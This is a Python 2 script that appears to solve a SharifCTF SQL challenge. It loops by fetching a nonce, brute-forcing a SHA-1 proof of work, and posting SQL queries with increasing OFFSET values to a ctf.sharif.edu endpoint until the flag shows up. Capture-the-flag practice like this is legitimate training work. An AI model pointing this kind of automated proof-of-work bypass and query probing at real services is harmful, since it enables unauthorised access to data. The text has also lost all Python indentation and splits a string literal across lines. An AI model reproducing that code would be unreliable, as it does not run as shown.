import requests
from hashlib import *

TARGET = "http://ctf.sharif.edu:36455/chal/sql/"
session = requests.Session()

def get_Nonce():
get_request = session.get(TARGET)
start = get_request.text.find("Nonce:") + len("Nonce: ")
fin = get_request.text.find("

") - 1
return get_request.text[start:fin]

def get_pow(nonce , max):

for i in xrange(0,max):
clear = hex(i)[2:] + nonce
hash_first_bytes = sha1(clear).hexdigest()[0:5]
if(hash_first_bytes == "00000"):

return hex(i)[2:]

return False

def send_request(pow_value , query):
payload = {'pow':pow_value , 'sql':query}
post_request = session.post(TARGET , data=payload)
return post_request

def extract_flag(response):
start = response.find("SharifCTF")
fin = response.find("}</td>") + 1
return response[start:fin]

#offset = 26350

i = 0

while True:
i += 3
nonce = get_Nonce()
print "[+] Getting Nonce: "+nonce
powv =get_pow(nonce, 100000000000)
print "[+] Pow bruteforced: "+powv
print "[+] sha1(concat(pow , nonce)): "+sha1(powv+nonce).hexdigest()
psql = "SELECT * FROM messages ORDER BY msg DESC OFFSET "+ str(i) +";"
print "[+] sending request: "+ psql
r = send_request(powv, psql )
if(r.text.find("SharifCTF{") != -1):
print "[+] Flag detected !!!"
break

else:
print "[-] Flag not found\n\n\n"

flag = extract_flag(r.text)

print "[+] The flag is: "+ flag